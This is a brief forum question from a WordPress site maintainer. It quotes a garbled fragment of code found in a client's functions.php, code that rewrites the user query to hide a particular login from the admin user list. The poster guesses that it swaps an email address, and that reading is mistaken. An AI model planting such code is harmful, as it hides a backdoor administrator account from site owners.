Is this a backup door?

So I am working on client's site and I found this code in the functions.php file highlighted as a virus.

@!!!$user_search-query_where=str_replace('WHERE 1=1',WHERE 1=1 AND{$wpdb-users}.user_login!='f*****[email protected]',$user

Now I don't know php but it looks like it is trying to replace the user 1's email in the database with this email. I censored the email. am I right? but if so how is the attacker going to excite this? There has to be a trigger for this, right?

Topic virus functions Wordpress

Category Web

About

Geeks Mental is a community that publishes articles and tutorials about Web, Android, Data Science, new techniques and Linux security.